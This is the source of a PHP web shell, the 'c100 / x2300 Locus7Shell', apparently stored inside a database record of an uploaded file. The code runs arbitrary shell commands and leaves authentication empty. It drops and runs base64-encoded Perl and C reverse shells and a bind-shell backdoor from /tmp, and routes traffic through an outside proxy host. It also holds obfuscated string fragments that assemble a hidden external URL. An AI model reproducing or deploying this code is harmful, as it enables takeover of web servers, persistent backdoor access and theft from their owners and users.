  \r\n*  -Added PHP-Proxy link to hide your ass                \r\n*  -Added your ip and server ip with whois capability    \r\n*  -Added private 0day released by allahaka which utilizes the linux\r\n*   sudo bash to execute a stack overflow.\r\n*========================================================\r\n$y1 = \'ev\';\r\n*  FEB. 14, 2007 RELEASE NOTES:                          \r\n+--------------------------------------------------------+\r\n*  PRIVATE RELEASE OF C100 SHELL FOR LOCUS7S MEMBERS     \r\n*  FAILURE TO DO SO WILL RESULT IN LOSS OF VIP           \r\n*  MEMBERS ACCESS, BAN FROM SITE, AND NO REFUND FOR VIP.\r\n*========================================================\r\n*  PRODUCT INFO:                                         \r\n+--------------------------------------------------------+\r\n*  C100 SHELL CREATED BY CAPTAIN CRUNCH SECURITY TEAM    \r\n*  WWW.CCTEAM.RU   \r\n                               \r\n*  C100 SHELL - REVAMPED (X2300) MODIFIED BY KINGDEFACER    \r\n*  UNDERGROUND NETWORK | WWW.ALTURKS.COM                 \r\n*  \\E0T/                                                 \r\n*********************************************************/\r\n\r\n//for php proxy purposes\r\n\r\nfunction selfURL() { $s = empty($_SERVER[\"HTTPS\"]) ? \'\' : ($_SERVER[\"HTTPS\"] == \"on\") ? \"s\" : \"\"; $protocol = strleft(strtolower($_SERVER[\"SERVER_PROTOCOL\"]), \"/\").$s; $port = ($_SERVER[\"SERVER_PORT\"] == \"80\") ? \"\" : (\":\".$_SERVER[\"SERVER_PORT\"]); return $protocol.\"://\".$_SERVER[\'SERVER_NAME\'].$port.$_SERVER[\'REQUEST_URI\']; } function strleft($s1, $s2) { return substr($s1, 0, strpos($s1, $s2)); }\r\n$selfurl = base64_encode(selfURL());\r\n$phprox=\"http://twofaced.org/proxy/index.php?q=\".$selfurl;\r\n\r\n//end of link\r\n$y2 = \'ilc\';\r\n//milw0rm search\r\n$Lversion = php_uname(r);\r\n$OSV = php_uname(s);\r\nif(eregi(\"Linux\",$OSV))\r\n{\r\n$Lversion=substr($Lversion,0,6);\r\n$millink=\"http://milw0rm.com/search.php?dong=Linux Kernel \".$Lversion;\r\n}else{\r\n$Lversion=substr($Lversion,0,3);\r\n$millink=\"http://milw0rm.com/search.php?dong=\".$OSV.\" \".$Lversion;\r\n}\r\n//End of milw0rm search\r\n$y3 = \'0de\';\r\n\r\n//w4ck1ng Shell\r\nif (!function_exists(\"myshellexec\"))\r\n{\r\nif(is_callable(\"popen\")){\r\nfunction myshellexec($command) {\r\nif (!($p=popen(\"($command)2>&1\",\"r\"))) {\r\nreturn 126;\r\n}\r\nwhile (!feof($p)) {\r\n$line=fgets($p,1000);\r\n$out .= $line;\r\n}\r\npclose($p);\r\nreturn $out;\r\n}\r\n}else{\r\nfunction myshellexec($cmd)\r\n{\r\nglobal $disablefunc;\r\n$result = \"\";\r\nif (!empty($cmd))\r\n{\r\n  if (is_callable(\"exec\") and !in_array(\"exec\",$disablefunc)) {exec($cmd,$result); $result = join(\"\\n\",$result);}\r\n  elseif (($result = `$cmd`) !== FALSE) {}\r\n  elseif (is_callable(\"system\") and !in_array(\"system\",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}\r\n  elseif (is_callable(\"passthru\") and !in_array(\"passthru\",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}\r\n  elseif (is_resource($fp = popen($cmd,\"r\")))\r\n  {\r\n   $result = \"\";\r\n   while(!feof($fp)) {$result .= fread($fp,1024);}\r\n   pclose($fp);\r\n  }\r\n}\r\nreturn $result;\r\n}\r\n}\r\n}\r\n$y4 = \'r.com\';\r\n$proxy_shit=\"[encoded data, 31468 characters]\";\r\n$y5 = \'/x.\';\r\n$back_connect_c=\"[encoded data, 8568 characters]\";\r\n$y6 = \'html\';\r\n$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";\r\n\r\n$backdoor=\"[encoded data, 11576 characters]\";\r\n\r\nfunction checkproxyhost(){\r\n$host = getenv(\"HTTP_HOST\");\r\n$filename = \'/tmp/.setan/xh\';\r\nif (file_exists($filename)) {\r\n$_POST[\'proxyhostmsg\']=\"</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If \'$host\' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won\'t be able to connect to this proxy.</br></br></center>\";\r\n} else {\r\n$_POST[\'proxyhostmsg\']=\"</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in \'/tmp\' this will make this fail.</br></br></center>\";\r\n}\r\n}\r\n\r\nif (!empty($_POST[\'backconnectport\']) && ($_POST[\'use\']==\"shbd\"))\r\n{\r\n$ip = gethostbyname($_SERVER[\"HTTP_HOST\"]);\r\n$por = $_POST[\'backconnectport\'];\r\nif(is_writable(\".\")){\r\ncfb(\"shbd\",$backdoor);\r\nex(\"chmod 777 shbd\");\r\n$cmd = \"./shbd $por\";\r\nexec(\"$cmd > /dev/null &\");\r\n$scan = myshellexec(\"ps aux\");\r\nif(eregi(\"./shbd $por\",$scan)){ $data = (\"\\n</br></br>Process found running, backdoor setup successfully.\"); }elseif(eregi(\"./shbd $por\",$scan)){ $data = (\"\\n</br>Process not found running, backdoor not setup successfully.\"); }\r\n$_POST[\'backcconnmsg\']=\"To connect, use netcat and give it the command <b>\'nc $ip $por\'</b>.$data\";\r\n}else{\r\ncfb(\"/tmp/shbd\",$backdoor);\r\nex(\"chmod 777 /tmp/shbd\");\r\n$cmd = \"./tmp/shbd $por\";\r\nexec(\"$cmd > /dev/null &\");\r\n$scan = myshellexec(\"ps aux\");\r\nif(eregi(\"./shbd $por\",$scan)){ $data = (\"\\n</br></br>Process found running, backdoor setup successfully.\"); }elseif(eregi(\"./shbd $por\",$scan)){ $data = (\"\\n</br>Process not found running, backdoor not setup successfully.\"); }\r\n$_POST[\'backcconnmsg\']=\"To connect, use netcat and give it the command <b>\'nc $ip $por\'</b>.$data\";\r\n}\r\n}\r\n\r\nif (!empty($_POST[\'backconnectip\']) && !empty($_POST[\'backconnectport\']) && ($_POST[\'use\']==\"Perl\"))\r\n{\r\nif(is_writable(\".\")){\r\ncf(\"back\",$back_connect);\r\n$p2=which(\"perl\");\r\n$blah = ex($p2.\" back \".$_POST[\'backconnectip\'].\" \".$_POST[\'backconnectport\'].\" &\");\r\n$_POST[\'backcconnmsg\']=\"Trying to connect to <b>\".$_POST[\'backconnectip\'].\"</b> on port <b>\".$_POST[\'backconnectport\'].\"</b>.\";\r\nif (file_exists(\"back\")) { unlink(\"back\"); }\r\n}else{\r\ncf(\"/tmp/back\",$back_connect);\r\n$p2=which(\"perl\");\r\n$blah = ex($p2.\" /tmp/back \".$_POST[\'backconnectip\'].\" \".$_POST[\'backconnectport\'].\" &\");\r\n$_POST[\'backcconnmsg\']=\"Trying to connect to <b>\".$_POST[\'backconnectip\'].\"</b> on port <b>\".$_POST[\'backconnectport\'].\"</b>.\";\r\nif (file_exists(\"/tmp/back\")) { unlink(\"/tmp/back\"); }\r\n}\r\n}\r\n\r\nif (!empty($_POST[\'backconnectip\']) && !empty($_POST[\'backconnectport\']) && ($_POST[\'use\']==\"C\"))\r\n{\r\nif(is_writable(\".\")){\r\ncf(\"backc\",$back_connect_c);\r\nex(\"chmod 777 backc\");\r\n//$blah = ex(\"gcc back.c -o backc\");\r\n$blah = ex(\"./backc \".$_POST[\'backconnectip\'].\" \".$_POST[\'backconnectport\'].\" &\");\r\n$_POST[\'backcconnmsg\']=\"Trying to connect to <b>\".$_POST[\'backconnectip\'].\"</b> on port <b>\".$_POST[\'backconnectport\'].\"</b>.\";\r\n//if (file_exists(\"back.c\")) { unlink(\"back.c\"); }\r\nif (file_exists(\"backc\")) { unlink(\"backc\"); }\r\n}else{\r\nex(\"chmod 777 /tmp/backc\");\r\ncf(\"/tmp/backc\",$back_connect_c);\r\n//$blah = ex(\"gcc -o /tmp/backc /tmp/back.c\");\r\n$blah = ex(\"/tmp/backc \".$_POST[\'backconnectip\'].\" \".$_POST[\'backconnectport\'].\" &\");\r\n$_POST[\'backcconnmsg\']=\"Trying to connect to <b>\".$_POST[\'backconnectip\'].\"</b> on port <b>\".$_POST[\'backconnectport\'].\"</b>.\";\r\n//if (file_exists(\"back.c\")) { unlink(\"back.c\"); }\r\nif (file_exists(\"/tmp/backc\")) { unlink(\"/tmp/backc\"); } }\r\n}\r\n\r\nfunction cf($fname,$text)\r\n{\r\n$w_file=@fopen($fname,\"w\") or err();\r\nif($w_file)\r\n{\r\n@fputs($w_file,@base64_decode($text));\r\n@fclose($w_file);\r\n}\r\n}\r\n\r\nfunction cfb($fname,$text)\r\n{\r\n$w_file=@fopen($fname,\"w\") or bberr();\r\nif($w_file)\r\n{\r\n@fputs($w_file,@base64_decode($text));\r\n@fclose($w_file);\r\n}\r\n}\r\n\r\nfunction err()\r\n{\r\n$_POST[\'backcconnmsge\']=\"</br></br><b><font color=red size=3>Error:</font> Can\'t connect!</b>\";\r\n}\r\n\r\nfunction bberr()\r\n{\r\n$_POST[\'backcconnmsge\']=\"</br></br><b><font color=red size=3>Error:</font> Can\'t backdoor host!</b>\";\r\n}\r\n\r\nfunction which($pr)\r\n{\r\n$path = ex(\"which $pr\");\r\nif(!empty($path)) { return $path; } else { return $pr; }\r\n}\r\nfunction ex($cfe)\r\n{\r\n$res = \'\';\r\nif (!empty($cfe))\r\n{\r\n  if(function_exists(\'exec\'))\r\n   {\r\n    @exec($cfe,$res);\r\n    $res = join(\"\\n\",$res);\r\n   }\r\n  elseif(function_exists(\'shell_exec\'))\r\n   {\r\n    $res = @shell_exec($cfe);\r\n   }\r\n  elseif(function_exists(\'system\'))\r\n   {\r\n    @ob_start();\r\n    @system($cfe);\r\n    $res = @ob_get_contents();\r\n    @ob_end_clean();\r\n   }\r\n  elseif(function_exists(\'passthru\'))\r\n   {\r\n    @ob_start();\r\n    @passthru($cfe);\r\n    $res = @ob_get_contents();\r\n    @ob_end_clean();\r\n   }\r\n  elseif(@is_resource($f = @popen($cfe,\"r\")))\r\n  {\r\n   $res = \"\";\r\n   while(!@feof($f)) { $res .= @fread($f,1024); }\r\n   @pclose($f);\r\n  }\r\n}\r\nreturn $res;\r\n}\r\n//EoW\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n//Start Enumerate function\r\n//function ENUMERATE()\r\n\r\n$hostname_x=php_uname(n);\r\n$itshome = getcwd();\r\n$itshome = str_replace(\"/home/\",\"~\",$itshome);\r\n$itshome = str_replace(\"/public_html\",\"/x2300.php\",$itshome);\r\n$enumerate = \"http://\".$hostname_x.\"/\".$itshome.\"\";\r\n\r\n//End Enumerate function\r\n\r\n//Starting calls\r\nini_set(\"max_execution_time\",0);\r\nif (!function_exists(\"getmicrotime\")) {function getmicrotime() {list($usec, $sec) = explode(\" \", microtime()); return ((float)$usec + (float)$sec);}}\r\nerror_reporting(5);\r\n$adires=\"\";\r\n@ignore_user_abort(TRUE);\r\n@set_magic_quotes_runtime(0);\r\n$win = strtolower(substr(PHP_OS,0,3)) == \"win\";\r\ndefine(\"starttime\",getmicrotime());\r\nif (get_magic_quotes_gpc()) {if (!function_exists(\"strips\")) {function strips(&$arr,$k=\"\") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != \"GLOBALS\") {strips($arr[\"$k\"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}\r\n$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);\r\nforeach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}\r\n\r\n$shver = \"1.0a beta\"; //Current version\r\n//CONFIGURATION AND SETTINGS\r\nif (!empty($unset_surl)) {setcookie(\"c999sh_surl\"); $surl = \"\";}\r\nelseif (!empty($set_surl)) {$surl = $set_surl; setcookie(\"c999sh_surl\",$surl);}\r\nelse {$surl = $_REQUEST[\"c999sh_surl\"]; //Set this cookie for manual SURL\r\n}\r\n\r\n$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.\r\n\r\nif ($surl_autofill_include and !$_REQUEST[\"c999sh_surl\"]) {$include = \"&\"; foreach (explode(\"&\",getenv(\"QUERY_STRING\")) as $v) {$v = explode(\"=\",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array(\"http://\",\"https://\",\"ssl://\",\"ftp://\",\"\\\\\\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name).\"=\".urlencode($value).\"&\";}}} if ($_REQUEST[\"surl_autofill_include\"]) {$includestr .= \"surl_autofill_include=1&\";}}\r\nif (empty($surl))\r\n{\r\n$surl = \"?\".$includestr; //Self url\r\n}\r\n$surl = htmlspecialchars($surl);\r\n\r\n$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.\r\n\r\n//Authentication\r\n$login = \"\"; //login\r\n//DON\'T FORGOT ABOUT PASSWORD!!!\r\n$pass = \"\"; //password\r\n$md5_pass = \"\"; //md5-cryped pass. if null, md5($pass)\r\n\r\n$host_allow = array(\"*\"); //array (\"{mask}1\",\"{mask}2\",...), {mask} = IP or HOST e.g. array(\"192.168.0.*\",\"127.0.0.1\")\r\n$login_txt = \"Restricted area\"; //http-auth message.\r\n$accessdeniedmess = \"<a href=\\\"http://ALTURKS.COM\\\">x2300 Locus7Shell v.\".$shver.\"</a>: access denied\";\r\n\r\n$gzipencode = TRUE; //Encode with gzip?\r\n\r\n$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)\r\n\r\n$c999sh_updateurl = \"http://ALTURKS.COM/files/', 'ok', '<form method=\"post\" action=\"file-upload-1.htm\" name=\"submit\" enctype=\"multipart/form-data\">\r\n  <input type=\"file\" name=\"fileField\"><br /><br />\r\n  <input type=\"submit\" name=\"submit\" value=\"Submit\">\r\n</form>', 'ok', '<form method=\"post\" action=\"file-upload-1.htm\" name=\"submit\" enctype=\"multipart/form-data\">\r\n  <input type=\"file\" name=\"fileField\"><br /><br />\r\n  <input type=\"submit\" name=\"submit\" value=\"Submit\">\r\n</form>', 3, NULL, NULL, NULL, NULL, NULL, NULL);

